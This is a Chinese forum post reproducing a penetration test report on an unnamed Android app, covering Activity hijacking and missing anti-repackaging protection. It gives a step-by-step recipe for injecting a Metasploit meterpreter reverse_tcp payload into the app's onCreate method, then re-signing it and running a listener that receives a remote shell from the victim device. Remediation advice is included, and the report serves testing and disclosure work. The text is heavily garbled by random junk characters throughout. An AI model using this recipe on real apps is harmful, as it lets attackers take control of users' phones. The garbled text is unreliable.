* U! _2 L- t3 u6 [& D$ L% o3 v w; T$ Y% g; b3 Q; v4 V5 p7 }   . g+ U0 ~. x: a% d$ @* A4 Z * z3 x- B) L c+ Y! c) k

. t( B5 M. h0 F Z: E" X3 }3 H : L. k$ k1 k3 _+ f

+ k% p( Q! U9 R1 }+ z& ]) { ( S! Z- |& r( l& |' { 1-2 测试结果 ) `5 q) q7 H8 ]6 [! P3 y u5 d# p# w$ S- Y" H8 y4 D: {

. B4 O" F; j$ v% `/ U3 F/ r1 U7 [8 L p4 Y- \5 f Z2 Y5 G, N2 P0 y

- q7 m3 c" T4 j# @$ |4 X0 A, R) B9 u% a' G$ y   4 k+ m* R/ D: s2 G + y7 O% o2 z6 t( A

6 v: p, o- i: P9 H/ Z ( H5 K4 R5 f0 O4 w) X( t4 R

8 y% m* z0 A: W) ]8 M7 t: l9 c1 f, ^0 V8 d 2 检测结果                    " P. ~) w/ S" S" p5 t [6 I8 x" ~8 f I) b

# `" u, C3 D4 O4 M# C& V % I* ]' I7 q+ S" u/ s2 F

3 Y( J7 b _. b; C5 _+ y! ?; \7 v. U& N' p% ~8 B$ G 2.1 某某某 ) r* _) A7 @. g# O" m& B% c+ z/ B4 H; t5 c1 B# Z+ w4 M( U

3 y% K* F; U( I7 w" r$ Q 7 p5 z/ Z5 o6 Y, S

5 n: b, S. S7 p: t ) X( C; n1 h3 p& U 2.1.1检测目标 6 e v. l1 Z% @+ Y y: ?* |. }' P7 e) [/ t7 D0 x9 y

8 i7 m; l/ i% ]- o6 V 3 F4 D* {8 n% Z3 f. R! W

# J/ @( |/ m6 I7 l1 v2 _( s4 a; Y5 N7 z1 |$ K3 ^ 目标地址: 某某某某某某APP 2 Q: t; `( Q! C+ a5 n ( O( ?+ `3 v0 G S/ n1 c5 c

# T0 `% h: V7 y0 w& H0 q / G7 Z/ @) T6 y, F7 u, m

: }& ~" z( Z7 |: \9 [ w ! K: ]$ v& \! j% J/ @2 I 2.1.2检测结果 & C7 N- E9 C; @7 i2 |+ |( P* a @% e3 H" L# e) i

; a# E, o* M. l0 \ 4 {5 ?4 u+ W6 x3 ]( d

0 ?8 e- P- O4 i( B7 ` 1 T. H2 h& [) \. H3 W: n5 @ 2.1.2.1 ) ^+ ?3 Q! _% r1 z 9 b3 X" z" h3 w% g

0 [' m+ j' B5 A! Q0 H& @ 7 N& P- }8 V1 R6 h

3 {1 ?) a9 l6 o" R# [7 S ; I1 k/ r, _# n5 S* H 漏洞链接地址:某某某某某某APP 0 v9 ?( w) l+ J# u' H) P 3 O- m4 f2 W3 d! Y' r! t2 r2 @

6 c5 u" ?" h% j* e+ x8 B3 Q( j) A- ^7 l. y! r6 m

% N1 o0 W( L9 ?' _% Z/ A5 W4 v3 J3 U   ' I& d! E2 u6 s2 v( ~# P& f$ q , ]5 ~$ l6 j6 O; T. l8 t7 B* W

# |. t6 y f7 @4 k* Q& _4 Z 5 Z) G0 |: ]) C$ j" [5 g/ N+ E

x% }7 q; d; k $ \" y: F0 X1 h& S* V 漏洞分析及取证: ( r0 k0 s' }* p/ C% { h/ n ' Y0 A, C( u' o5 D8 V7 }

" ?9 v0 A+ S8 S7 t; q# \$ p0 {' n0 Z& H/ ~6 U z5 y

) {* o( o9 X; E# N$ a . ~6 I$ y4 [3 V/ R, e1 w( I; Y                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 6 y) d6 r2 p, t* v0 } : u! m6 _9 @3 G# j7 j

! f) `& S u( D: r w0 |9 d: A2 X; V: @1 D

; y g5 z3 j8 e M1 ?4 F0 w0 O / C3 t+ K* }3 a4 G& U1 i5 x3 B      9 e5 t3 }: \8 ^! ? y; H9 l( \

h# z: o$ s+ ?+ {5 e: j T / d$ X8 k O Q+ ^7 O

# X! J9 V. ?1 V# Y . S' }: S: f p3 O! |! G# l                       " u9 T0 ?* i( c9 O3 t: ^) I+ Z# o, m8 C6 U

6 F% X3 f# r6 T" C0 [! a3 s4 ] ; F; s; q' E7 d

; V3 o4 u9 f+ ~8 s# m# F3 ?1 E7 {! j9 q/ E# w" j2 _5 b , S9 Z' \( \ \) a, w 4 l, a& K9 B+ c: J: i

8 ?, l) g$ n, l& h8 M( e; `# l+ h5 ]' y

9 o* f. t0 A0 s7 e8 t% r9 Y 0 C; x* V9 B9 R0 m, b" g6 b $ K& u$ K# {8 E: o# o, M) \ H' O# a4 m6 w% a8 G8 {' |! g

' U: h! u) v8 Y8 t1 F; d ! l! S$ F! C( D$ r$ P4 b

% g, f3 a# @/ o g 7 Y; C N0 b. ^ 9 ]# I; A$ X, i5 m 3 ~7 ?" L4 n3 b x6 \3 ~% V

+ O1 O9 r' G8 u( a. E$ ]$ S7 H* [* N8 K4 N, l+ ]

7 d$ Q4 ]' G" w& U * Z: {0 ]* c: E 漏洞危害:高 2 Q+ p0 I, R. p0 ?) _$ E. R8 k# f: d2 V6 E- s# j& |5 T

3 M+ y; y: r0 M$ U6 w ) k, C& q" b& D# @
! v5 n9 i: f1 w2 J2 H: \; K& V x- e$ g 3 V. G( |5 D; D: w% z4 d& Z+ n$ p# F1 q2 f' e9 K0 S S: d( U' Y" Z, ^# Q1 y$ L5 n+ v% H6 ~% Z8 ?! E3 Z3 G! F3 @( s( m! O0 N9 u, u$ U' w+ u0 G! H, @2 H7 }% ]+ w8 w+ c0 O( r, v8 w0 F5 _3 }$ ?0 W% n. M! a, a$ }# `. \ z) S) r) l0 X+ x+ m9 i5 _) G! Q/ t3 [0 |8 \4 `5 H+ N' Q9 h- T' x5 i$ F) [! U( `6 n1 M9 S% M4 j4 [! k* H' V" E7 g: m0 J9 v* a: g m% S5 s: j! `1 c$ N' L. e8 b0 h1 a! N# m- u" `; P* ^& V. S& f+ g3 c- @* f4 ?6 J1 E I$ S: ]" z$ E0 g4 k0 I8 `) Z( U& r, x6 A/ _ B7 M' Z6 ~9 N) @$ i/ L# I$ u/ n2 I* l2 }/ e: A; Z, F8 C3 t5 c' E
2 r( P7 {* N9 X" S# B8 l7 x" k. O8 ]: A( y7 q! _

9 c" A1 N% h+ @- C" \ , d; r$ E8 P, P* x: u 严重程度 8 s& W. M! @0 p* `! F ( \# O7 w$ i( g% K' i" K% [

2 q! v7 s0 t5 ]! l& q! c: q$ n: Z' Q5 U8 M$ ] 		0 b; {- L+ t; M+ S- K8 w! [ - ~6 @9 J5 \0 w# m4 m

& w2 b8 Z" ^! x7 h( X+ K ! U% n8 d* m! }8 [, q B/ A1 i' s" Q/ F8 J5 c 2 j e2 p9 t$ _6 {

3 L4 U/ j8 ] v0 E ) r( i z7 X1 e/ X1 ~9 i8 l 		& z" y q$ F( R6 x , }/ P8 V6 n" g7 H4 M

+ p6 P f( `/ H9 Z 1 L+ K5 m8 U( E ( `3 D) ^, d _ `4 K 8 n0 C* g- J) }

0 H7 l3 Z+ a( D. F, r8 W! D6 e8 M% o' \- r1 O* u+ H 		( b* Q$ r" S8 `1 i 9 @1 Z) ~4 k( R; K% _4 j; r

' z: e1 D+ I8 A+ D+ N, O+ ~" ]& p& @% G* }$ @: ` , }6 k) c9 U0 _/ s & W; u% b u3 O& n6 G, U/ w. S

% C3 D/ t- v; l$ s' Z- M+ h & x# E" [) x! C& h+ r4 C' T" Q3 ~ 		5 Z+ p9 L" Z% V# v& Y. R! O3 S) F2 `2 r' C8 l& t& Y8 i/ {& o

7 B% j, E2 K+ \, \5 R2 U5 C, g- A6 E# f/ D* O; X. c* M   + T/ t) ~9 [, V/ j5 X$ H+ y / I5 v! v) |4 Z2 } R4 I: v" |

4 e d/ r' }- m1 [% g & F a# K) i3 F! [ 		7 I m" n) t1 W, z. w* a+ Y% S5 p

3 @( k/ c2 ?: ~3 H) f6 c 2 b' W8 X' D6 k1 I * A5 y8 r( y7 ` + R* v* `# K @' K; B

: Y% G7 U4 H, x0 R$ h$ l6 J( c* [2 J7 W8 w! K 		* H! e4 \2 u; y& J- { 7 {: L" x) O# h8 f. D

8 E5 Z% Z3 @( E5 B ; B( \) \, _! I& Z   " Y& M3 o+ M5 u" p4 b' ?6 I9 L 8 B4 q9 T* X; ?0 ]4 W

& M1 l f# E1 H# b9 B, D2 _ 7 [* {6 W* r. z8 Q; n; l$ \
( l- O0 ~$ n! t8 j7 h" K0 N$ n# _/ ~4 v* X
* l$ D; p; M9 p, f8 P7 \ / K% r. s- r& }7 X9 ?1 |/ p

z* a7 X' E! A6 f% Z # v9 a: ?6 g6 A7 W   , J4 K/ Y- A5 M7 p O! `7 m! P4 h6 R( ]

7 M& ~6 L* m V) p: x/ { # @2 x, g( h6 S: L

/ j% t+ a. P2 _0 z. ~0 y2 @" U$ s 8 \# }6 a1 `# }$ [/ j7 T 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 5 h, v0 }9 j4 s, ~3 ^/ U2 ~2 Z* o, }1 {# ] [2 G$ K$ t- N( D

& k0 k0 R! x) h' M- X & w. k( A$ r W: B# O# S/ j+ G

1 p9 B, ^$ X0 ^6 C ) k4 a! S- i4 X( b! r o! f           7 S, |" R( L% m$ I4 V" E % e& ~: v; L/ y$ [7 j

% Z4 y( K9 j' ~& c3 [* I$ G; r" X1 W( R j! _" P0 d' P3 k2 R: r( E; \. T

7 h; E% w% X s$ c* \0 I! L! m& F+ P# |: U, U& d   - \! { v% P% [& W ; N, D( e3 K* [6 ?! ^

0 q, A2 }0 [2 d ; S: e$ Z9 @, f. |6 e. q+ V9 j

& v9 y9 S; f' E 6 B' N) G+ R' T: e7 s8 @ ] 2.1.2.2 ; w+ g a6 O ~' r0 d& C& q9 q

3 |: M% c, m7 g1 h5 ?* h T $ ?% R# \0 @1 _* [1 c- z

/ R1 V6 @" W: m% u" H* Z2 x5 B. H( z 漏洞链接地址:某某某某某某APP : K3 E) Y4 `$ D& s- k' ?: F* V 2 R. \" G. V" n2 B- x; q

! l) N! H- ?" K% d : [# M9 `) ? i4 A V- C( Y: r0 H1 [

) c, ?- j& @8 u# Z ' p' J: @3 k2 t- } 漏洞分析及取证: 1 F2 [# R% t3 l: O8 C6 Z& O+ ]/ Q / N; v' M. _1 N0 }' Q) f

) y: {, b3 G% s ! ?8 V0 l6 a' l Z" m1 w

f) I. G# A/ \) _7 e : e# O( I0 A: |' q9 ~                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 0 ]; K& H5 }7 P' {+ Q0 a# o ) ?' d2 B' s! n" G1 ~4 } [0 k/ n

# _$ w+ i3 ]9 z( g; [6 z- b _4 ?) ~3 R4 Q* |9 t) X

7 f/ S5 d' {( Y8 ~$ }/ f5 V " W4 r5 J$ i2 _8 }1 {* Q Metasploit 生成木马 apk 6 J. f4 A' I( }+ A 4 l8 k [) ~/ H( Z. V

0 l6 l4 C! k) m! A( P9 L- y6 W0 S. p- W+ `2 f3 ]

7 u" b- \6 P, [! [! i* H; H! X 4 m+ E: _& S1 V+ _# F' q3 b msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk / }; w! w# ^# v : C5 F/ k7 k9 J0 K

8 G# ^# H+ k0 j) L. J: \& z / z# k9 V* \ X

0 ?5 B6 r& _' R0 h' b$ f/ d6 T 0 |5 y: `4 s' P2 R! Q3 w 反编译目标apk和木马apk ) w' f1 e& l' o2 A4 L- e7 J 7 X8 S' M8 k% M9 s/ M- K6 }

/ g. M0 h( [% y0 M" j# K 2 ]1 z( T) I6 J% ~1 L2 L$ p9 O" H- h) D

) _! ]4 A1 P2 V j$ K- Y+ H$ f% z' ?" f apktool d target.apk
! \9 V( r# v3 J8 O8 W r2 h V1 w3 s5 t' W( ]- u apktool d cockhorse.apk ) W+ V7 u+ @+ I: H1 D / x+ w' c- S9 k0 j& o& A) `9 @

5 N1 o. i. n, Q$ s1 ? 7 q3 q3 U& t3 D$ e7 d

4 T5 s1 m3 v% [0 E3 _ 6 F6 x; q* U+ G4 b, J- b 木马 apk 注入目标 apk + n6 P" H& {' a* Z. p7 O ) D5 t: l5 r/ Z6 s1 o

; m. _/ J/ E7 z% C. K6 v8 E n. T 8 n# E! R+ L4 z& K; B/ H7 B- b% v9 n

4 g) a* ?- J# T% ]# S$ j1 A9 d, ^, U4 S4 ^- q0 W 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
1 X- x) B; y. w9 q1 l% d- Y6 s$ t/ T: k invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ; L2 l$ Z7 t3 h \, Z, ^. f3 f& g) O6 d- ~9 m$ `1 m' X& M

" u T# `" O6 j5 @+ V1 ~ ! I m) x1 V+ X

' s$ z2 F, y5 \7 K9 Q. s' l& p; w9 m + r2 U# \# |. H1 A3 J. n9 _ 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 1 n& t6 [% p9 u3 r2 G: U 3 y, G& q$ `7 {3 U8 w# ?

T% I, T$ D! E: |8 i ( K. t5 C4 a; i5 C8 B; l

# X# ]3 U5 S/ L/ r. \1 s% k - O+ s' O* w' v4 T. f 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ; U! ~! B6 k, d! f3 J" h; s* }- U$ ]. t! V9 q& J

$ C- ?3 x" `; I 2 y$ x% ~5 S# Y3 B" V

2 u2 w& ]% ]& M+ i, i + I1 [2 x' R3 Q 回编译生成最终 apk 4 `9 P; D5 h0 F J1 p1 k0 |5 C* r) p, _2 \3 _8 J1 y5 j( F7 a0 _* q

1 s+ n* x$ }4 C& D. y+ Z, U ( S' ]: A9 ~8 k4 _ }

$ `4 k4 c" O) J: A. F* b$ `9 O 2 R# B! G5 L; a- {; |5 H7 p 重新打包 ) S- c" h2 [4 Y1 i8 Y2 K; \! P6 P. j5 D. I& p# `* `( ?

- n0 p1 S# |2 Q) ], E: E8 |5 S7 C7 ?' C0 g

j- v9 v" y- @3 R; Y/ t3 g1 H- G# K$ ?; h9 g4 m. v apktool b -o repackage.apk target_app_floder 4 C {3 R) B4 k 4 I" ^1 D. i2 P4 Z- e8 }

( N) M5 F/ |3 x1 z) c 1 m! a$ a8 W. D+ L) M" q

. I E! j4 ^4 W! \& ? 2 j/ H& H" n0 F# Q. a4 ~! S 创建签名文件,有的话可忽略此步骤 8 r$ v7 v5 C: A+ ^' ^( O: R 9 ]7 g3 ?- `! c" T

5 B9 x {+ O" b0 _4 ]$ ]8 t% x ]: J% w: t, [* [$ j. M5 k

3 J& R6 c8 w6 Y8 [7 } ' d) C; a& x) A* G \4 @/ ]9 ?: O keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                $ n3 T$ F; p, x% @. G# u' l- c2 Q. j5 I

/ T' o0 {" c3 x * U! p2 E7 f" Y$ b9 P$ j

, ]5 g7 k2 i8 W9 G0 | Q+ O + \# q! \! z0 G' Q3 l/ O% ^6 T! ?/ [ 签名,以下任选其一 : H# E# @. I: y' z# I" D$ I - y4 P( Z/ n! ?

$ v6 p7 k7 q- H* m 6 L9 O, t9 c7 `; m* y

+ F* j" x5 p [+ E; p# [) G" C 7 g# @# @4 s; b, h2 u/ Y jarsigner 方式 7 S- v/ O3 z! {" ^3 K# z 8 E3 v6 w7 H) D" G( p+ \5 z

- g: U* s4 {( w v/ {" Y9 I& m- T# d! p% V8 y9 c6 d

1 S+ C4 F `* X8 D' \. K Z. z! F' z' P jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ) ?2 u5 q) @, |$ g" ]$ \ % e- r V' J- E' Q6 g

+ }1 n3 A2 s- x2 S / f L' H7 e$ R& q9 s- h

$ E: F( D' r% o$ \ ; e! J7 l, s7 |6 | apksigner 方式 8 ~' _( z# O( o6 Y ; L, h) T- {( b' W x v

] v; P4 O: N+ ^( C% n ) W9 M' [* ~# k9 [

$ a+ `8 w1 G, O; D, q0 F6 D# v( @% V j) C apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk , N' r+ ~+ }; Z0 M9 M4 x ! [, s( J1 x' I7 W' q! Q

! W/ T' T Z f 7 C+ ?2 u6 R9 j! v

- l, y9 U4 k3 ]+ k0 U. z0 }; I- V! |2 J# r" ~: w2 V7 H, l) q 如需要禁用 v2签名 添加选项--v2-signing-enabled false ! j; o, i e" h1 v+ U& L* _: K; z' N R# v, d

$ {5 T; p( N! V$ X' H" p: m+ S8 Q! O! T8 s

% u( P8 w* _1 A0 d& _: K) V ( |& t6 u. p v3 i 验证,以下任选其一 0 k1 D1 Z8 y( m6 E2 S : k: U; G, M8 _

/ \* k' ~) d: g8 \1 r# x" d) n; l & c3 |$ _4 b, @( J# J" E% [

# I% M7 d* r9 h % b" L& b) W7 E4 y( S jarsigner方式 8 X# e: {, J$ [* w 9 d! h8 W2 s/ p2 a2 G$ R

4 {1 Y4 M3 {! A6 p6 |; p , o3 r t9 p4 ]$ m% r; ?

6 v$ ^$ l, F: ^% i1 I) M- g! i 2 o" g2 A; W( R4 V jarsigner -verify repackaged.apk 5 |/ x+ a, k; M: o" i( ? s' B( K 8 @; b2 |- i; _/ ?4 X

" z$ v0 a, T% k / u+ g" P& a1 T# h% P8 M" t

* s# Y0 w4 t& X& i. ? \: R1 p6 @; {7 L$ e apksigner 方式 9 X( v& k' d8 Y! e7 C0 O7 Y ! [( F# I9 K; F

8 Z L( Z e8 @) b1 e2 J' W6 q& X: x, G- |& W

+ @5 Y; d p& C 0 r, b+ G5 N# ]6 d. p apksigner verify -v --print-certs repackaged.apk . K% c. i% E. h. v' b& a0 B% |7 E* f t4 B; F$ O% d, m

0 i5 x, T( ^6 d* w: y 2 ^/ C& c3 Z( ~6 _

_5 P8 | n2 I8 F P: L) I5 [3 C) Y r/ S0 H keytool方式 6 Y4 S1 E2 U. ]) J 6 V+ ^% |; ~2 t( h0 D8 w1 M

# T4 {$ u# C! Z) H5 E& A0 L& I( j. f9 F8 B: k

8 W2 Y/ y7 t; v. d ' C w# [( @6 O. O keytool -printcert -jarfile repackaged.apk ; u1 s$ j& ]" D- l. l4 ? 9 U: I. e& c9 @" J, N( m! ^- ]

/ c! o, e( f# F3 y: e$ b' s , X/ Q7 r4 P( V0 p) B8 s

& e7 l& {, B: ~" I4 r# N # Y! e& H$ d" F; n 对齐 ; L8 A$ S- N) f0 o8 v! D ! ~/ g/ r% o* F

! j- M2 z7 k4 K- F , h$ {* P# B8 G: H6 ~4 v* A t0 A

1 W! p: |; N) d3 Y2 R, p' o- S! ` . ~7 I( [2 K ^7 `" J0 f 字节对齐优化 ( R% x7 n6 z6 Z g n+ f5 W V' u8 J( m3 M# T+ o

, k) A& Z7 s1 W5 n 0 d" K/ H( E0 e( d2 y2 h7 R! i/ D) p

3 [0 i7 Y) S8 p9 c8 F* P: X # P1 t- P& G/ m$ A9 F' B zipalign -v 4 repackaged.apk final.apk : g# G9 J2 y* d7 u& j1 { ) ]) G3 T3 }( {4 l( _/ G/ p

2 L5 ?1 O5 y) b& _3 @& z0 q 4 d) F; M5 C. h8 M! _8 I0 y

- E* p3 ]* W) ~, F& N 3 k! u6 K9 I( o/ F1 o; H# s, n( w 检查是否对齐 % D9 Z/ X( p) C0 l4 n. n ' G! H) ^1 h$ j1 m& `1 {0 q7 L

% ?8 |0 M* h7 `6 t3 T : I8 k& Y9 P- ]7 p5 y3 U" J

, U* u- V1 J9 a 7 N. m0 s# U+ A5 b zipalign -c -v 4 final.apk 6 t7 _$ c: D: v2 S% x. ^# f3 {* q # \5 K3 M! S. f4 d3 k3 b9 _

2 z" Q& f0 c& v& P0 K4 M5 Z" k4 h# K + `7 @1 d) R) u/ b. o% f

' h0 A" f0 P p' z 7 s8 ?2 d; v4 a# X; j 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 " o* s8 `6 [+ l3 q+ |( z - _7 M9 `: F' x

. M; }1 k4 e" q$ e# [; t: \$ U , ^" q: }7 \( g ?- `6 } \

, A( L1 [. Q0 c9 ?( L' K 1 |( Q! p& \4 _/ d 启动Metasploit控制台,配置参数等待上线 6 _9 W& ?+ j3 w& Q' p 7 Z8 ~' q* I8 q1 H# }! A

" x; ]* Y" A5 I7 O 8 \. b+ U/ {3 T/ i. s! l

5 k Z) J: D3 G. J i$ T: ~, L0 i/ g( V7 r 在终端依次输入如下命令 & t$ s4 x7 {# `9 ^ " s# G% T% H* A- }% _

, `* E9 w9 u, N: i- I D1 v( k3 T . w0 t4 t _, H- S

+ D& U& C. @1 d . x( }: L2 w, G' x W$ f0 D msfconsole & y- O( R3 s5 \% y0 c5 P! ]) e% w2 C& k# P" E* S

5 E% {" l' y9 H. ^1 X! n9 B* c ' T, p" s! e1 f1 Y1 i

6 o# a0 v4 i2 T9 I, L 6 e2 L1 }3 n& m' ^5 L use exploit/multi/handler 5 X) A7 ^6 H1 o* ] F- X+ U8 i8 }. d8 A

; l$ r H* O. @3 C- z# y: B' ` 0 p' f- ]9 e: ~7 F$ V3 z1 K" W% j* U

1 x; J1 x# W5 [# x0 i+ K2 M # b8 Q; B3 N& }/ t set PAYLOAD android/meterpreter/reverse_tcp 3 |6 D: e# E5 V 2 }7 l% J, A) p" x6 f' ]" F8 n; |# F

/ Y/ A* v( L& f5 H4 X, m, v3 y5 l! H 9 B& ~( p# p% R8 L" ] g

6 m$ B4 G( E7 d5 O* z/ h# b( D; h ~- U2 o5 w$ V6 r set LHOST 192.xxx.xx.xx " f& U; O" v" g6 l. \, H8 h' R; m N: u

8 T9 g" _; ?/ Q; @* c7 Q * o7 L) q$ \! }2 o

9 W# Q, ~" y* U8 U1 `" |2 D + y$ m1 c% g; _4 ^: z$ J4 Q set LPORT 4444 ! h1 r' l9 X1 Y, X" k O% v: d9 V# {% w" }4 T3 i

& M3 y& D, O) i" u8 _! O, j + s) a: q. P% D1 u: Q+ v

$ d5 ?* ?* g% f9 n2 m G/ {* G; x' H5 R4 ~$ z+ g# c exploit , f2 {9 t# C( _1 Z& h ; i8 Y# D1 b) q. k

4 M& {; h% T/ X' M! ? 9 u( r7 k8 R. v9 s

4 K2 j' n+ l2 N" H7 A5 u& y1 T' [ 4 t5 X, B! |4 r6 v0 v9 j. r1 z 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ! A/ U0 O% l$ E$ o % t. ~% } H0 K' T+ I' F4 h5 F! d6 b

7 o2 `4 N9 x8 l! h* B5 ~, i, _$ n" P) N# i( ^7 _5 X# N2 W: N& f% B; [

- m- v$ Y( O& k " R5 q. Z& C! z+ X# n 漏洞危害:中 $ |. Y' |6 L5 Y4 { B8 c# E ) u! i/ l1 d: F: w0 T7 _2 O

6 }; T6 y4 L% H" i y6 ~1 q0 Z) h) Y7 v" f3 [$ \6 H: N
4 ]8 H1 _- f: \; M ; ^% l, O2 L' i, h+ h / e1 Y' Q2 m& [$ p9 O 1 e% f5 f5 x. u4 t( g4 U $ _; j% t+ Y/ Q" C6 S" T H1 w, ~; Q# B) W l% I8 O- i4 @9 z& b' {& ^( m6 {4 S8 b/ R* @( r! f+ M! E1 @/ \2 L/ R& s# v, `6 d7 a, `0 j+ q9 {2 l, F3 H0 [$ v) N8 B4 d5 y' t k% }- }1 ^! ^6 ?8 O* f; A1 [! J; s: m4 X0 o+ B" C- a) M* U) B' s$ c0 I. b: U. g( ~6 B3 R5 z* S( p( _6 }. C3 \" B( @8 N: c2 A; U" f+ c+ M/ ^0 w1 S3 L1 c" W8 v6 O0 G( G2 t3 g4 `. F5 q- p! Z8 {# Q* B. W$ m+ j+ Q2 a- ~% @# n. ?& v4 o8 n- \1 {, q+ p l" k- i& V& l' W* [+ t) o+ p3 H3 m: f4 w7 {, ?5 v9 L& X. H8 f u/ b& S) x9 L- l1 a1 S* }% t/ {* {% x+ P4 v% |; a& |9 Z7 r$ Y# u' R. b) Z; Q: r# e: B6 i* \8 Z& j" e5 {7 `' N. J! @- ~6 u7 J8 V' k7 ^" r( {5 S7 ?1 _& [
6 Y) y6 L& `/ p+ j' d" j+ T. O: ?: h

}) C2 M& l; M. W9 m# U 4 l3 N/ m! F. V 严重程度 / K( S' k" U. a* `+ ?0 k0 {, H+ b z( x% w7 R

; v4 U8 `7 D3 k3 f 1 @! {" M+ j% r9 H$ v, I3 L 		4 D* C( D0 y3 S# \& Z. Y. ]5 { # q& P l4 [ j0 ^: S

2 [* O: M. T7 V" |+ T0 M - @" W8 d0 Q) L. V( \0 |/ @ 2 h1 ^# {) {: w. y! I. z' e) N; r( g/ D% I+ S

- T! a5 W6 Y: R% _ 0 F" _ {) k2 ^. M. q* `9 E% n 		7 E. [: K! E. ~" w " u8 d! L4 V& T* N2 p1 c! w! c/ d

6 f: c O9 \- J( j 8 P b4 U8 t$ X, o% I/ U , J& u( H3 P4 |% k + ]$ `: [- Q/ j4 m* [6 {4 l& _$ I8 H. ]

# Q6 m `! b* Z4 f6 Z i. U$ X/ v7 o 		2 }! o8 U3 t |9 d 6 f# d& v7 f* {6 M5 n2 x8 Q# K: N

g! R, p( }& R, r1 c ) ?8 x; q, L& X: K8 V1 W$ V & }; z8 U0 b! c( p3 ?* c' P , Q x" X/ G! [. W% b

1 ^# j! I4 s( y : M) l- o6 n" v2 e 		/ f4 u c4 e3 B, c4 O; ^ & `3 B! ]' G+ w1 {: H( u , q/ S' T; R6 s. S c, w; K( O4 S

- q/ ?9 z8 p8 v$ O7 x( G8 V) L" O # m r- m2 x) n/ _   . }8 ^0 x4 y; |1 e3 w) x% }8 P |, g% d& y/ t0 M# p6 a+ g; U' z/ ?" G

( b9 P, [: n$ ~; I, g- g7 P7 S3 E( R; s " ]# u* P% n% L% u, o2 |* u, u 		9 e+ Z2 V" H* }0 p 6 M% h! ^2 {. n/ p7 v% R

) T' y. m* a: S/ O9 `7 r# y6 E 6 D4 ?) P e( m- j: ~ 7 `* r( O. `4 G' k/ H- N, Q( t0 `! N

h/ R$ w, S$ {( t- G+ W8 R' O" |7 d: v, e5 j0 A9 g6 k7 } 		& Z( b8 Q% H/ k0 G/ d 7 e- |6 u, d$ K& A' g1 F8 H' E$ R" s ( y+ |3 I, ?; w7 h& Q$ A 2 s+ V0 `4 s( P( N9 B6 J

9 ~3 l1 s4 i+ _* i/ m/ k) F5 E( @8 ]7 h" J" e# }4 h0 O" b   * ]8 a3 @& G( A6 V - b5 f8 L) x; J$ Y/ P

! c6 l+ {' D/ U4 e9 l& A o7 u$ q6 E 9 Y7 O5 a# F0 D7 J" T% ]; X
! M9 I1 N3 t( [% B : m. X4 p1 l& {, }! m1 }
, D% d1 h# r- \3 }0 O( f3 D/ ?2 S' ]8 K. @

4 `% [4 d7 g6 f) I, g5 t+ M9 S% m6 z$ S& {) n5 U   ' d% f; j/ ^" |' x/ H+ ^ ' B! V+ t. U( S5 U

& p: N2 B( [/ s* x( z' w ) B' l/ e; o0 a, H9 ], d5 x: x* \

$ h1 f; B* ?7 V* F. F' w) M+ S. M$ m8 i; B0 W; G, b' X 修复方法: / E' h: d$ |% t d: B$ T: n 9 h5 z' Z. b2 }3 ^1 c+ ^

6 ]% q4 ~4 w, Q" F7 g1 j 1 J3 N, W+ x4 x5 F( o

6 T8 E8 z* b/ p. w3 p . [, L% C9 J* o( C2 q               1. APP 启动时应做签名校验防止二次打包。
2 X; K. Q. P1 a' o8 n ) @* f1 j7 s7 A0 \% M 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 & s& U( L. y- s6 T- u9 D. ]) C 0 b3 o. D$ S6 ^( [3 S/ [- r

5 S+ G7 R3 Z: @% U" Z: x . M, H0 f: x$ D5 H6 Z9 F5 o " i2 I& U# s1 ^ : w9 l d: P$ w2 f9 c

# i3 E# a' I1 f O4 @. M . N9 L2 L& S. [' ^, v1 K   . `0 r' ~7 ^: S) ]8 `9 D, p/ [/ f2 `2 D8 s5 I( ], z

# S: G9 S' I3 C) X! E 6 w1 i, \2 K/ |6 q * x: @4 Y1 R/ ?- T, G+ ^ , I2 Q9 B+ [( K* e2 a$ ^

0 ^8 d1 K+ Q6 x6 T ! g2 _$ M( _9 r5 k, k" l
5 q7 w9 |6 }, N4 r* u) E1 a4 K" Q

: } Y. x6 r& t % @1 ?! h3 m0 u% D
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表